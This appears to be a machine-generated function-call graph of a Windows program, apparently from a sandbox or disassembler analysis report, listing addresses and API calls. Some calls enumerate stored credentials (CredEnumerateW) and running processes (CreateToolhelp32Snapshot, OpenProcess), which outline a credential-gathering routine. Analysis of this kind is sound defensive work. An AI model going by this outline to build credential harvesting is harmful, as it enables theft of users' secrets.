36489 420add 11 API calls 36489->36482 36491 420dd0 36490->36491 36492 420dc8 36490->36492 36491->36479 36547 41def0 87 API calls 36492->36547 36495 41ddc6 36494->36495 36496 41ddb6 36494->36496 36502 41dde3 36495->36502 36526 41abba memset memset 36495->36526 36525 4460ad 11 API calls 36496->36525 36498 41ddc0 36498->36479 36498->36489 36501 41de91 36529 4460ad 11 API calls 36501->36529 36502->36498 36502->36501 36504 41de28 36502->36504 36505 41de3e 36502->36505 36506 41de47 36504->36506 36508 41de39 36504->36508 36505->36498 36530 41c3aa 87 API calls 36505->36530 36506->36505 36507 41de58 36506->36507 36509 41de7b memset 36507->36509 36511 41de6b 36507->36511 36527 41a9c4 memset memcpy memset 36507->36527 36515 41cb6a 36508->36515 36509->36498 36528 41c17a memset memcpy memset 36511->36528 36514 41de77 36514->36509 36516 41cb96 memset 36515->36516 36517 41cba9 36515->36517 36518 41cc30 36516->36518 36520 41cbc1 36517->36520 36531 41fb6c 19 API calls 36517->36531 36518->36505 36521 41cbf8 36520->36521 36532 417103 36520->36532 36521->36518 36523 41cc24 memcpy 36521->36523 36524 41cc17 memset 36521->36524 36523->36518 36524->36518 36525->36498 36526->36502 36527->36511 36528->36514 36529->36505 36531->36520 36535 419544 36532->36535 36543 4194c7 SetFilePointer 36535->36543 36538 419561 ReadFile 36540 41958e 36538->36540 36541 41957e GetLastError 36538->36541 36539 417119 36539->36521 36540->36539 36542 419595 memset 36540->36542 36541->36539 36542->36539 36544 4194f3 GetLastError 36543->36544 36545 419509 36543->36545 36544->36545 36546 4194ff GetLastError 36544->36546 36545->36538 36545->36539 36546->36545 36547->36491 38699 419b1c 38701 419bb8 38699->38701 38705 419b31 38699->38705 38700 419b4d UnmapViewOfFile CloseHandle 38700->38700 38700->38705 38703 419b83 38703->38705 38711 41a475 20 API calls 38703->38711 38705->38700 38705->38701 38705->38703 38706 41950e 38705->38706 38707 41952d CloseHandle 38706->38707 38708 419536 38707->38708 38709 41951f 38707->38709 38708->38705 38709->38708 38710 419525 Sleep 38709->38710 38710->38707 38711->38703 36579 44692c 36598 446b3c 36579->36598 36581 446938 GetModuleHandleA 36583 446948 __set_app_type __p__fmode __p__commode 36581->36583 36584 4469dc 36583->36584 36585 4469e4 __setusermatherr 36584->36585 36586 4469f0 36584->36586 36585->36586 36599 446b28 _controlfp 36586->36599 36588 4469f5 _initterm __wgetmainargs _initterm 36589 446a56 GetStartupInfoW 36588->36589 36590 446a48 36588->36590 36592 446a9e GetModuleHandleA 36589->36592 36600 4122ba 36592->36600 36596 446ad5 _cexit 36596->36590 36597 446ace exit 36597->36596 36598->36581 36599->36588 36601 4122ca 36600->36601 36643 4053e1 LoadLibraryW 36601->36643 36603 4122d2 36635 4122d6 36603->36635 36652 416ae7 36603->36652 36606 412315 36658 411fb2 memset ??2@YAPAXI 36606->36658 36608 412337 36670 40b247 36608->36670 36613 412360 36688 40e1b5 memset 36613->36688 36614 412374 36693 40e017 memset 36614->36693 36617 41236f 36715 412103 ??3@YAXPAX DeleteObject 36617->36715 36619 40b3c8 _wcsicmp 36624 41238a 36619->36624 36621 4124b3 36716 40b7d1 free free 36621->36716 36623 4123b0 CoInitialize 36714 411f2f GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 36623->36714 36624->36617 36624->36623 36698 4121db 36624->36698 36626 4124bc 36717 408d81 36626->36717 36629 4123c0 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 36634 4124a4 CoUninitialize 36629->36634 36640 412417 36629->36640 36634->36617 36635->36596 36635->36597 36636 41241d TranslateAcceleratorW 36637 41248e GetMessageW 36636->36637 36636->36640 36637->36634 36637->36636 36638 412456 IsDialogMessageW 36638->36637 36638->36640 36639 41244a IsDialogMessageW 36639->36637 36639->36638 36640->36636 36640->36638 36640->36639 36641 412478 TranslateMessage DispatchMessageW 36640->36641 36642 41246c IsDialogMessageW 36640->36642 36641->36637 36642->36637 36642->36641 36644 405434 #17 36643->36644 36645 40540c GetProcAddress 36643->36645 36648 40543d 36644->36648 36646 405425 FreeLibrary 36645->36646 36647 40541c 36645->36647 36646->36644 36649 405430 36646->36649 36647->36646 36650 405444 MessageBoxW 36648->36650 36651 40545b 36648->36651 36649->36648 36650->36603 36651->36603 36653 416af0 36652->36653 36654 4122e1 SetErrorMode GetModuleHandleW EnumResourceTypesW 36652->36654 36721 40ae2a memset 36653->36721 36654->36606 36657 416b04 GetProcAddress 36657->36654 36659 41202d 36658->36659 36660 412052 ??2@YAPAXI 36659->36660 36661 412069 36660->36661 36665 41206e 36660->36665 36743 40e35c memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 36661->36743 36732 4465ae 36665->36732 36669 4120e8 wcscpy 36669->36608 36748 40b7d1 free free 36670->36748 36672 40b39c 36749 40b02a 36672->36749 36675 40aff4 malloc memcpy free free 36682 40b282 36675->36682 36676 40b371 36676->36672 36772 40aff4 36676->36772 36678 40b30d free 36678->36682 36682->36672 36682->36675 36682->36676 36682->36678 36752 40aef6 36682->36752 36764 409fb3 36682->36764 36683 40aef6 7 API calls 36683->36672 36684 40b3c8 36685 40b3d0 36684->36685 36686 40b3ef 36684->36686 36685->36686 36687 40b3d9 _wcsicmp 36685->36687 36686->36613 36686->36614 36687->36685 36687->36686 36777 40e18e 36688->36777 36690 40e1e8 GetModuleHandleW 36782 40e055 36690->36782 36694 40e18e 3 API calls 36693->36694 36695 40e047 36694->36695 36855 40df8f 36695->36855 36869 4036a1 36698->36869 36700 4121f5 36701 4122b3 36700->36701 36702 412220 _wcsicmp 36700->36702 36704 412257 36700->36704 36903 412145 7 API calls 36700->36903 36701->36617 36701->36623 36702->36700 36704->36701 36872 411618 36704->36872 36710 412273 36711 410042 39 API calls 36710->36711 36712 4122a5 36711->36712 36713 4117d3 14 API calls 36712->36713 36713->36701 36714->36629 36715->36621 36716->36626 36718 408d87 free 36717->36718 36719 408d8e 36717->36719 36718->36719 36720 40b7d1 free free 36719->36720 36720->36635 36722 40ae61 GetSystemDirectoryW 36721->36722 36723 40ae72 wcscpy 36721->36723 36722->36723 36728 409cd8 wcslen 36723->36728 36726 40aea7 LoadLibraryW 36727 40aeac 36726->36727 36727->36654 36727->36657 36729 409ce3 36728->36729 36730 409cf8 wcscat LoadLibraryW 36728->36730 36729->36730 36731 409ceb wcscat 36729->36731 36730->36726 36730->36727 36731->36730 36733 4465b4 DeleteObject 36732->36733 36734 4465be 36732->36734 36733->36734 36744 40a282 36734->36744 36736 41209e 36737 401711 36736->36737 36738 401748 36737->36738 36739 40174c GetModuleHandleW LoadIconW 36738->36739 36740 40171f wcsncat 36738->36740 36741 40ade4 36739->36741 36740->36738 36742 40adf8 36741->36742 36742->36669 36742->36742 36743->36665 36747 40a1bc memset wcscpy 36744->36747 36746 40a29a CreateFontIndirectW 36746->36736 36747->36746 36748->36682 36750 40b030 free 36749->36750 36751 40b03a 36749->36751 36750->36751 36751->36684 36753 40af11 36752->36753 36754 40af05 wcslen 36752->36754 36755 40af35 36753->36755 36756 40af2c free 36753->36756 36754->36753 36758 409fb3 3 API calls 36755->36758 36757 40af3f 36756->36757 36759 40af58 36757->36759 36760 40af4f free 36757->36760 36758->36757 36762 409fb3 3 API calls 36759->36762 36761 40af64 memcpy 36760->36761 36761->36682 36763 40af63 36762->36763 36763->36761 36765 40a000 36764->36765 36766 409fba malloc 36764->36766 36765->36682 36768 409ff6 36766->36768 36769 409fdb 36766->36769 36768->36682 36770 409fef free 36769->36770 36771 409fdf memcpy 36769->36771 36770->36768 36771->36770 36773 40b002 free 36772->36773 36774 40b00d 36772->36774 36775 40b018 36773->36775 36776 409fb3 3 API calls 36774->36776 36775->36683 36776->36775 36801 40a189 GetModuleFileNameW 36777->36801 36779 40e194 wcsrchr 36780 40e1a3 36779->36780 36781 40e1a7 wcscat 36779->36781 36780->36781 36781->36690 36802 44ddb0 36782->36802 36786 40e0ab 36805 446665 GetFileVersionInfoSizeW 36786->36805 36789 40e0e2 wcscpy wcscpy 36832 40dba3 36789->36832 36790 40e0cd wcscpy 36790->36789 36793 40dba3 3 API calls 36794 40e121 36793->36794 36795 40dba3 3 API calls 36794->36795 36796 40e137 36795->36796 36797 40dba3 3 API calls 36796->36797 36798 40e14a EnumResourceNamesW EnumResourceNamesW wcscpy 36797->36798 36838 40df2e 36798->36838 36801->36779 36803 40e062 memset memset 36802->36803 36804 40a189 GetModuleFileNameW 36803->36804 36804->36786 36806 40e0c9 36805->36806 36807 44668b 36805->36807 36806->36789 36806->36790 36808 446693 ??2@YAPAXI GetFileVersionInfoW VerQueryValueW 36807->36808 36809 4466c2 36808->36809 36810 4466e8 VerQueryValueW 36808->36810 36809->36810 36811 446737 wcscpy 36810->36811 36812 4466ff _snwprintf 36810->36812 36814 446747 36811->36814 36845 4465d6 9 API calls 36812->36845 36846 4465d6 9 API calls 36814->36846 36815 446733 36815->36811 36815->36814 36817 446759 36847 4465d6 9 API calls 36817->36847 36819 44676e 36848 4465d6 9 API calls 36819->36848 36821 446783 36849 4465d6 9 API calls 36821->36849 36823 446798 36850 4465d6 9 API calls 36823->36850 36825 4467ad 36851 4465d6 9 API calls 36825->36851 36827 4467c2 36852 4465d6 9 API calls 36827->36852 36829 4467d7 36853 4465d6 9 API calls 36829->36853 36831 4467ec ??3@YAXPAX 36831->36806 36833 44ddb0 36832->36833 36834 40dbb0 memset GetPrivateProfileStringW 36833->36834 36835 40dc00 36834->36835 36836 40dc0a WritePrivateProfileStringW 36834->36836 36835->36836 36837 40dc06 36835->36837 36836->36837 36837->36793 36839 44ddb0 36838->36839 36840 40df3b memset 36839->36840 36841 40df5a LoadStringW 36840->36841 36842 40df74 36841->36842 36842->36841 36843 40df8c 36842->36843 36854 40dc1c memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 36842->36854 36843->36617 36845->36815 36846->36817 36847->36819 36848->36821 36849->36823 36850->36825 36851->36827 36852->36829 36853->36831 36854->36842 36865 40a157 GetFileAttributesW 36855->36865 36857 40df98 36858 40df9d wcscpy wcscpy GetPrivateProfileIntW 36857->36858 36864 40e011 36857->36864 36866 40db0b GetPrivateProfileStringW 36858->36866 36860 40dfec 36867 40db0b GetPrivateProfileStringW 36860->36867 36862 40dffd 36868 40db0b GetPrivateProfileStringW 36862->36868 36864->36619 36865->36857 36866->36860 36867->36862 36868->36864 36904 40e63b 36869->36904 36873 4116e2 36872->36873 36874 411635 memset 36872->36874 36886 4115de 36873->36886 36944 40a189 GetModuleFileNameW 36874->36944 36876 41165d wcsrchr 36877 411672 36876->36877 36878 411675 wcscat 36876->36878 36877->36878 36945 416644 wcscpy wcscpy wcscpy CreateFileW CloseHandle 36878->36945 36880 4116ba 36946 40324b 36880->36946 36884 4116d2 37004 40e54f SendMessageW memset SendMessageW 36884->37004 36887 40324b 27 API calls 36886->36887 36888 411613 36887->36888 36889 410c23 36888->36889 36890 410c85 36889->36890 36894 410c37 36889->36894 37029 409c5b LoadCursorW SetCursor 36890->37029 36892 410c8a 37030 41686c 36892->37030 37033 403c78 36892->37033 36893 410c3e _wcsicmp 36893->36894 36894->36890 36894->36893 37051 41078d 10 API calls 36894->37051 36895 410c9e 36896 40b3c8 _wcsicmp 36895->36896 36899 410cae 36896->36899 36897 410cf6 36899->36897 36900 410ced qsort 36899->36900 36900->36897 36903->36700 36905 40e64c 36904->36905 36917 40e41c 36905->36917 36908 40e6a8 memcpy memcpy 36909 40e6f3 36908->36909 36909->36908 36910 40e72e ??2@YAPAXI ??2@YAPAXI 36909->36910 36912 40d5e2 16 API calls 36909->36912 36911 40e7a1 36910->36911 36913 40e76a ??2@YAPAXI 36910->36913 36927 40e5bb 36911->36927 36912->36909 36913->36911 36916 4036b0 36916->36700 36918 40e427 ??3@YAXPAX 36917->36918 36919 40e42e 36917->36919 36918->36919 36920 40e435 ??3@YAXPAX 36919->36920 36921 40e43c 36919->36921 36920->36921 36922 40e446 ??3@YAXPAX 36921->36922 36923 40e44d 36921->36923 36922->36923 36924 40e46d ??2@YAPAXI ??2@YAPAXI 36923->36924 36925 40e466 ??3@YAXPAX 36923->36925 36926 40e45d ??3@YAXPAX 36923->36926 36924->36908 36925->36924 36926->36925 36928 40b02a free 36927->36928 36929 40e5c4 36928->36929 36930 40b02a free 36929->36930 36931 40e5cc 36930->36931 36932 40b02a free 36931->36932 36933 40e5d4 36932->36933 36934 40b02a free 36933->36934 36935 40e5dc 36934->36935 36936 40aff4 4 API calls 36935->36936 36937 40e5ef 36936->36937 36938 40aff4 4 API calls 36937->36938 36939 40e5f9 36938->36939 36940 40aff4 4 API calls 36939->36940 36941 40e603 36940->36941 36942 40aff4 4 API calls 36941->36942 36943 40e60d 36942->36943 36943->36916 36944->36876 36945->36880 37005 406cd0 36946->37005 36948 40325a 36949 406cd0 27 API calls 36948->36949 36950 403273 36949->36950 36951 406cd0 27 API calls 36950->36951 36952 40328a 36951->36952 36953 406cd0 27 API calls 36952->36953 36954 4032a4 36953->36954 36955 406cd0 27 API calls 36954->36955 36956 4032bb 36955->36956 36957 406cd0 27 API calls 36956->36957 36958 4032d2 36957->36958 36959 406cd0 27 API calls 36958->36959 36960 4032e9 36959->36960 36961 406cd0 27 API calls 36960->36961 36962 403300 36961->36962 36963 406cd0 27 API calls 36962->36963 36964 403317 36963->36964 36965 406cd0 27 API calls 36964->36965 36966 40332e 36965->36966 36967 406cd0 27 API calls 36966->36967 36968 403345 36967->36968 36969 406cd0 27 API calls 36968->36969 36970 40335c 36969->36970 36971 406cd0 27 API calls 36970->36971 36972 403373 36971->36972 36973 406cd0 27 API calls 36972->36973 36974 40338a 36973->36974 36975 406cd0 27 API calls 36974->36975 36976 4033a1 36975->36976 36977 406cd0 27 API calls 36976->36977 36978 4033b8 36977->36978 36979 406cd0 27 API calls 36978->36979 36980 4033cf 36979->36980 36981 406cd0 27 API calls 36980->36981 36982 4033e6 36981->36982 36983 406cd0 27 API calls 36982->36983 36984 403400 36983->36984 36985 406cd0 27 API calls 36984->36985 36986 40341a 36985->36986 36987 406cd0 27 API calls 36986->36987 36988 40343c 36987->36988 36989 406cd0 27 API calls 36988->36989 36990 403457 36989->36990 36991 406cd0 27 API calls 36990->36991 36992 403472 36991->36992 36993 406cd0 27 API calls 36992->36993 36994 40348d 36993->36994 36995 406cd0 27 API calls 36994->36995 36996 4034a5 36995->36996 36997 406cd0 27 API calls 36996->36997 36998 4034c0 36997->36998 36999 406cd0 27 API calls 36998->36999 37000 4034df 36999->37000 37001 406cd0 27 API calls 37000->37001 37002 4034fa 37001->37002 37003 401fec GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 37002->37003 37003->36884 37004->36873 37008 406f91 37005->37008 37007 406cd5 37007->36948 37009 407032 37008->37009 37010 406fa8 GetModuleHandleW FindResourceW 37008->37010 37009->37007 37011 406fc6 LoadResource 37010->37011 37013 406feb 37010->37013 37012 406fd4 SizeofResource LockResource 37011->37012 37011->37013 37012->37013 37013->37009 37021 40b5f5 37013->37021 37015 40700c memcpy 37024 406ed7 memcpy 37015->37024 37017 407022 37025 406dc5 18 API calls 37017->37025 37019 40702a 37026 40b671 37019->37026 37022 40b671 ??3@YAXPAX 37021->37022 37023 40b5fd ??2@YAPAXI 37022->37023 37023->37015 37024->37017 37025->37019 37027 40b685 37026->37027 37028 40b677 ??3@YAXPAX 37026->37028 37027->37009 37028->37027 37029->36892 37031 41689b 37030->37031 37032 41687c FreeLibrary 37030->37032 37031->36895 37032->37031 37034 403c88 37033->37034 37035 408d81 free 37034->37035 37036 403cda 37035->37036 37052 413f68 37036->37052 37040 403e44 37261 404076 15 API calls 37040->37261 37042 403e4d 37043 408d81 free 37042->37043 37044 403e59 37043->37044 37044->36895 37045 403d6d memset memcpy 37046 403db0 wcscmp 37045->37046 37047 403d00 37045->37047 37046->37047 37047->37040 37047->37045 37047->37046 37259 403037 11 API calls 37047->37259 37260 40f041 6 API calls 37047->37260 37050 403de5 _wcsicmp 37050->37047 37051->36894 37053 413f75 37052->37053 37054 413fc6 37053->37054 37262 40cc16 37053->37262 37055 413fd5 memset 37054->37055 37063 41421f 37054->37063 37345 412d29 37055->37345 37062 4142d7 37065 4142e8 memset memset 37062->37065 37066 414377 37062->37066 37072 414281 37063->37072 37447 4131ce memset memset memset memset memset 37063->37447 37064 41409f 37356 41335f memset memset memset memset memset 37064->37356 37070 416b94 17 API calls 37065->37070 37068 41438b memset memset 37066->37068 37154 41441a 37066->37154 37075 416b94 17 API calls 37068->37075 37069 414012 37069->37064 37079 41403c 37069->37079 37076 414326 37070->37076 37071 413fa7 37077 413fb9 37071->37077 37543 416148 CoTaskMemFree 37071->37543 37072->37062 37470 41303d memset memset memset memset memset 37072->37470 37074 41442e memset memset 37085 416b94 17 API calls 37074->37085 37086 4143c9 37075->37086 37087 406cd0 27 API calls 37076->37087 37329 41691e 37077->37329 37089 409a0c 344 API calls 37079->37089 37081 414276 37559 40b7d1 free free 37081->37559 37083 4144ca memset memset 37493 416b94 37083->37493 37092 414476 37085->37092 37094 406cd0 27 API calls 37086->37094 37088 414336 37087->37088 37096 40a2de 6 API calls 37088->37096 37097 41404e 37089->37097 37090 413fb2 37544 4160f3 FreeLibrary 37090->37544 37104 406cd0 27 API calls 37092->37104 37100 4143d9 37094->37100 37095 414602 memset memset memset 37107 414662 37095->37107 37108 41469e 37095->37108 37110 414346 37096->37110 37545 413eec 20 API calls 37097->37545 37098 414250 37098->37081 37121 409a0c 344 API calls 37098->37121 37114 40a2de 6 API calls 37100->37114 37102 4140df 37547 40b7d1 free free 37102->37547 37116 414486 37104->37116 37105 414755 memset memset 37118 416b94 17 API calls 37105->37118 37106 4147ba 37113 403cf9 37106->37113 37124 414852 memset memset memset 37106->37124 37125 414807 37106->37125 37107->37108 37109 41466c 37107->37109 37112 416b94 17 API calls 37108->37112 37631 409f85 wcslen 37109->37631 37561 40a157 GetFileAttributesW 37110->37561 37111 406cd0 27 API calls 37122 414519 37111->37122 37123 4146ac 37112->37123 37258 413d12 45 API calls 37113->37258 37126 4143e9 37114->37126 37115 4142a6 37137 409a0c 344 API calls 37115->37137 37157 4142cc 37115->37157 37127 40a2de 6 API calls 37116->37127 37128 414793 37118->37128 37121->37098 37509 40a2de wcslen wcslen 37122->37509 37134 406cd0 27 API calls 37123->37134 37136 416b94 17 API calls 37124->37136 37153 406cd0 27 API calls 37125->37153 37626 40a157 GetFileAttributesW 37126->37626 37138 414496 37127->37138 37129 40a2de 6 API calls 37128->37129 37139 4147ab 37129->37139 37130 41467d 37634 413e30 memset 37130->37634 37131 414355 37131->37066 37562 4010a6 37131->37562 37142 4146bd 37134->37142 37143 4148a8 37136->37143 37137->37115 37627 40a157 GetFileAttributesW 37138->37627 37651 40a157 GetFileAttributesW 37139->37651 37152 40a2de 6 API calls 37142->37152 37156 406cd0 27 API calls 37143->37156 37149 414069 37150 414092 37149->37150 37178 409a0c 344 API calls 37149->37178 37546 40b7d1 free free 37150->37546 37151 406cd0 27 API calls 37162 41455e 37151->37162 37164 4146d1 37152->37164 37165 41481e _wcsicmp 37153->37165 37154->37074 37168 4144b7 37154->37168 37155 4143f8 37155->37154 37166 4010a6 254 API calls 37155->37166 37167 4148b9 37156->37167 37560 40b7d1 free free 37157->37560 37158 4140ad 37158->37102 37379 409a0c memset 37158->37379 37159 4144a5 37159->37168 37169 413db6 260 API calls 37159->37169 37161 413db6 260 API calls 37171 414694 37161->37171 37514 40b43e 37162->37514 37174 413db6 260 API calls 37164->37174 37175 41483b 37165->37175 37236 414831 37165->37236 37166->37154 37176 40a2de 6 API calls 37167->37176 37168->37083 37209 4145ec 37168->37209 37169->37168 37170 414105 37177 406cd0 27 API calls 37170->37177 37171->37105 37171->37106 37173 41409a 37173->37063 37430 415799 37173->37430 37179 4146e1 37174->37179 37652 44653e 23 API calls 37175->37652 37181 4148cd 37176->37181 37182 41410f 37177->37182 37178->37149 37184 406cd0 27 API calls 37179->37184 37653 40a157 GetFileAttributesW 37181->37653 37548 4159f3 _wcsicmp _wcsicmp 37182->37548 37183 4010a6 254 API calls 37183->37113 37188 4146ed 37184->37188 37185 41484d 37185->37113 37192 40a2de 6 API calls 37188->37192 37190 4148dc 37197 414935 37190->37197 37198 406cd0 27 API calls 37190->37198 37191 414118 37193 414217 37191->37193 37194 41412a memset memset memset memset 37191->37194 37195 414701 37192->37195 37552 415776 37193->37552 37549 40a22f wcscpy wcsrchr 37194->37549 37202 413db6 260 API calls 37195->37202 37196 4145e1 37628 40b4e4 37196->37628 37655 44653e 23 API calls 37197->37655 37205 4148fd 37198->37205 37208 414711 37202->37208 37210 40a2de 6 API calls 37205->37210 37207 414948 37212 414a31 37207->37212 37214 406cd0 27 API calls 37208->37214 37209->37095 37209->37171 37215 414911 37210->37215 37211 40a22f 2 API calls 37217 4141ab 37211->37217 37216 406cd0 27 API calls 37212->37216 37213 41457c memset 37218 406cd0 27 API calls 37213->37218 37219 41471d 37214->37219 37654 40a157 GetFileAttributesW 37215->37654 37221 414a3d 37216->37221 37222 40a22f 2 API calls 37217->37222 37223 41456b 37218->37223 37224 40a2de 6 API calls 37219->37224 37226 40a2de 6 API calls 37221->37226 37227 4141ba 37222->37227 37223->37196 37223->37213 37228 40a2de 6 API calls 37223->37228 37521 40b3fa 37223->37521 37526 413db6 37223->37526 37535 40b477 37223->37535 37229 414731 37224->37229 37225 414920 37225->37197 37232 41494d memset 37225->37232 37230 414a51 37226->37230 37227->37193 37234 406cd0 27 API calls 37227->37234 37228->37223 37231 413db6 260 API calls 37229->37231 37658 40a157 GetFileAttributesW 37230->37658 37231->37171 37237 406cd0 27 API calls 37232->37237 37238 4141d5 37234->37238 37236->37113 37236->37183 37239 414975 37237->37239 37240 40a2de 6 API calls 37238->37240 37241 40a2de 6 API calls 37239->37241 37242 4141e5 37240->37242 37243 414989 37241->37243 37551 40a157 GetFileAttributesW 37242->37551 37245 40b43e 9 API calls 37243->37245 37254 4149bf 37245->37254 37246 4141f4 37246->37193 37247 409a0c 344 API calls 37246->37247 37247->37193 37248 40b477 9 API calls 37248->37254 37249 414a26 37250 40b4e4 FindClose 37249->37250 37250->37212 37251 40b3fa 2 API calls 37251->37254 37252 406cd0 27 API calls 37252->37254 37253 40a2de 6 API calls 37253->37254 37254->37248 37254->37249 37254->37251 37254->37252 37254->37253 37256 414a04 37254->37256 37656 40a157 GetFileAttributesW 37254->37656 37657 44653e 23 API calls 37256->37657 37258->37047 37259->37050 37260->37047 37261->37042 37263 40cc23 37262->37263 37659 40b7d1 free free 37263->37659 37265 40cc36 37660 40b7d1 free free 37265->37660 37267 40cc3e 37661 40b7d1 free free 37267->37661 37269 40cc46 37270 40b02a free 37269->37270 37271 40cc4e 37270->37271 37662 40c722 memset 37271->37662 37276 40aed1 9 API calls 37277 40cc71 37276->37277 37278 40aed1 9 API calls 37277->37278 37279 40cc7e 37278->37279 37691 40c871 37279->37691 37283 40cd25 37292 40b8ec 37283->37292 37284 40cd1a 37733 40521a 39 API calls 37284->37733 37290 40cc93 37290->37283 37290->37284 37291 40cae2 50 API calls 37290->37291 37716 40acc5 37290->37716 37291->37290 37901 4075c7 37292->37901 37295 40ba99 37921 407670 37295->37921 37297 40b92a 37297->37295 37300 406cd0 27 API calls 37297->37300 37298 40b91b CredEnumerateW 37298->37297 37301 40b93e wcslen 37300->37301 37301->37295 37303 40b95a 37301->37303 37302 40b962 wcsncmp 37302->37303 37303->37295 37303->37302 37306 40b9b9 memset 37303->37306 37307 40b9e3 memcpy 37303->37307 37308 40ba4d wcschr 37303->37308 37309 406cd0 27 API calls 37303->37309 37311 40ba7f LocalFree 37303->37311 37924 40b899 28 API calls 37303->37924 37925 407687 37303->37925 37306->37303 37306->37307 37307->37303 37307->37308 37308->37303 37310 40ba32 _wcsnicmp 37309->37310 37310->37303 37310->37308 37311->37303 37312 41607f 37940 416068 37312->37940 37315 406cd0 27 API calls 37316 416095 37315->37316 37317 40ae2a 8 API calls 37316->37317 37318 41609b 37317->37318 37319 4160a3 37318->37319 37320 4160c6 37318->37320 37322 406c77 27 API calls 37319->37322 37321 416068 FreeLibrary 37320->37321 37323 4160cb 37321->37323 37324 4160ad GetProcAddress 37322->37324 37323->37071 37324->37320 37325 4160d0 37324->37325 37326 4160e0 37325->37326 37327 416068 FreeLibrary 37325->37327 37326->37071 37328 4160ee 37327->37328 37328->37071 37943 4167d1 37329->37943 37331 416a37 37331->37054 37333 4167d1 42 API calls 37334 416963 37333->37334 37335 416a2d 37334->37335 37964 41678a GetVersionExW 37334->37964 37337 4167d1 42 API calls 37335->37337 37337->37331 37338 4169b1 memcmp 37343 4169a4 37338->37343 37339 416a23 37968 41689d 42 API calls 37339->37968 37343->37338 37343->37339 37965 4168bd 42 API calls 37343->37965 37966 40adc6 GetVersionExW 37343->37966 37967 41689d 42 API calls 37343->37967 37346 412d3e 37345->37346 37969 412db7 37346->37969 37348 412daa 37983 40b7d1 free free 37348->37983 37350 412d44 37350->37348 37354 412d95 37350->37354 37980 40a5eb CreateFileW 37350->37980 37351 412db3 wcsrchr 37351->37069 37354->37348 37355 409f85 2 API calls 37354->37355 37355->37348 37357 416b94 17 API calls 37356->37357 37358 4133e9 37357->37358 37359 416b94 17 API calls 37358->37359 37360 4133f7 37359->37360 37361 40a2de 6 API calls 37360->37361 37362 413414 37361->37362 37363 40a2de 6 API calls 37362->37363 37364 41342f 37363->37364 37365 40a2de 6 API calls 37364->37365 37366 413447 37365->37366 37367 412e96 20 API calls 37366->37367 37368 41345b 37367->37368 37369 412e96 20 API calls 37368->37369 37370 41346c 37369->37370 38010 4134f0 memset 37370->38010 37372 413481 37373 4134e1 37372->37373 37375 41348d memset 37372->37375 37377 409f85 2 API calls 37372->37377 37378 40aed1 9 API calls 37372->37378 38024 40b7d1 free free 37373->38024 37375->37372 37376 4134e9 37376->37158 37377->37372 37378->37372 38037 40aca5 WideCharToMultiByte 37379->38037 37381 409a46 38038 404f45 memset 37381->38038 37384 409a63 memset memset memset memset memset 37385 406cd0 27 API calls 37384->37385 37386 409afb 37385->37386 37387 40a2de 6 API calls 37386->37387 37388 409b0b 37387->37388 37389 406cd0 27 API calls 37388->37389 37390 409b1a 37389->37390 37391 40a2de 6 API calls 37390->37391 37392 409b2a 37391->37392 37393 406cd0 27 API calls 37392->37393 37394 409b39 37393->37394 37395 40a2de 6 API calls 37394->37395 37396 409b49 37395->37396 37397 406cd0 27 API calls 37396->37397 37398 409b58 37397->37398 37399 40a2de 6 API calls 37398->37399 37400 409b68 37399->37400 37401 406cd0 27 API calls 37400->37401 37402 409b77 37401->37402 37403 40a2de 6 API calls 37402->37403 37404 409b87 37403->37404 38057 40a157 GetFileAttributesW 37404->38057 37406 409b98 37407 409bb2 37406->37407 37408 409b9d 37406->37408 38059 40a157 GetFileAttributesW 37407->38059 38058 40913e 79 API calls 37408->38058 37411 409bad 37411->37158 37412 409bbe 37413 409bc3 37412->37413 37414 409bd5 37412->37414 38060 40948f 204 API calls 37413->38060 38061 40a157 GetFileAttributesW 37414->38061 37417 409be1 37418 409be6 37417->37418 37419 409bfb 37417->37419 38062 4097b9 31 API calls 37418->38062 38063 40a157 GetFileAttributesW 37419->38063 37422 409c07 37423 409c21 37422->37423 37424 409c0c 37422->37424 38065 40a157 GetFileAttributesW 37423->38065 38064 4097b9 31 API calls 37424->38064 37427 409c2d 37427->37411 37428 409c32 37427->37428 38066 4097b9 31 API calls 37428->38066 37431 408d81 free 37430->37431 37432 4157b2 CreateToolhelp32Snapshot memset Process32FirstW 37431->37432 37433 41594d Process32NextW 37432->37433 37434 4157f2 OpenProcess 37433->37434 37435 415964 CloseHandle 37433->37435 37436 415840 memset 37434->37436 37437 4158fd 37434->37437 37435->37170 38071 415974 37436->38071 37437->37433 37439 41590c free 37437->37439 37440 409fb3 3 API calls 37437->37440 37439->37437 37440->37437 37441 415884 GetModuleHandleW 37443 415893 GetProcAddress 37441->37443 37444 41586c 37441->37444 37443->37444 37444->37441 38076 4153a6 37444->38076 38092 4156f1 37444->38092 37446 4158ef CloseHandle 37446->37437 37448 416b94 17 API calls 37447->37448 37449 413258 37448->37449 37450 416b94 17 API calls 37449->37450 37451 413266 37450->37451 37452 40a2de 6 API calls 37451->37452 37453 413283 37452->37453 37454 40a2de 6 API calls 37453->37454 37455 41329e 37454->37455 37456 40a2de 6 API calls 37455->37456 37457 4132b6 37456->37457 37458 412e96 20 API calls 37457->37458 37459 4132ca 37458->37459 37460 412e96 20 API calls 37459->37460 37461 4132db 37460->37461 37462 4134f0 33 API calls 37461->37462 37463 4132f0 37462->37463 37464 413350 37463->37464 37465 4132fc memset 37463->37465 37468 409f85 2 API calls 37463->37468 37469 40aed1 9 API calls 37463->37469 38106 40b7d1 free free 37464->38106 37465->37463 37467 413358 37467->37098 37468->37463 37469->37463 37471 416b94 17 API calls 37470->37471 37472 4130c7 37471->37472 37473 416b94 17 API calls 37472->37473 37474 4130d5 37473->37474 37475 40a2de 6 API calls 37474->37475 37476 4130f2 37475->37476 37477 40a2de 6 API calls 37476->37477 37478 41310d 37477->37478 37479 40a2de 6 API calls 37478->37479 37480 413125 37479->37480 37481 412e96 20 API calls 37480->37481 37482 413139 37481->37482 37483 412e96 20 API calls 37482->37483 37484 41314a 37483->37484 37485 4134f0 33 API calls 37484->37485 37491 41315f 37485->37491 37486 4131bf 38107 40b7d1 free free 37486->38107 37487 41316b memset 37487->37491 37489 4131c7 37489->37115 37490 409f85 2 API calls 37490->37491 37491->37486 37491->37487 37491->37490 37492 40aed1 9 API calls 37491->37492 37492->37491 37494 416ae7 9 API calls 37493->37494 37495 416ba6 37494->37495 37496 416bd9 memset 37495->37496 38108 40a2a9 37495->38108 